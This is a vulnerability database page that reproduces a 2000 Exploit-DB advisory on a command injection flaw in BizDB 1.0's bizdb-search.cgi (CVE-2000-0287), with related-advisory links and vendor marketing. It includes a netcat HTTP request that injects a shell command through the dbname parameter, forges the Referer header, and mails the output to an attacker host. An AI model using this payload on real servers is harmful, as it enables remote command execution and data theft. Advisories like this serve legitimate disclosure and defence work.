Lucene search
+L

CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution

🗓️ 13 Apr 2000 00:00:00Reported by PErfecto TechnologyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

CNC Technology BizDB 1.0 allows remote command execution via unchecked variable in CGI script.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
BizDB bizdb-search.cgi Arbitrary Command Execution
26 Apr 200000:00
nessus
cve
CVE
CVE-2000-0287
22 Jan 200105:00
cve
cvelist
Cvelist
CVE-2000-0287
22 Jan 200105:00
cvelist
euvd
EUVD
EUVD-2000-0286
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-0287
12 Apr 200004:00
nvd
openvas
OpenVAS
bizdb1-search.cgi located
3 Nov 200500:00
openvas
openvas
OpenVAS
bizdb1-search.cgi located
3 Nov 200500:00
openvas
source: https://www.securityfocus.com/bid/1104/info

BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver.

The variable is dbname, and if passed a semicolon followed by shell commands they will be executed. This cannot be exploited from a browser, as the software checks for a referrer field in the HTTP request. A valid referrer field can however be created and sent programmatically or via a network utility like netcat.


The following netcat session will cause a copy of the output of the ls command to be mailed to attacker@attacker-host

netcat target 80
GET
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@attacker-host|&f6=^a.*&action=searchdbdisplay
HTTP/1.0
Host: target
Referer: http://target/cgi-bin/bizdb1-search.cgi?bizdb-search
(empty line)
(End of Input)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.10625
46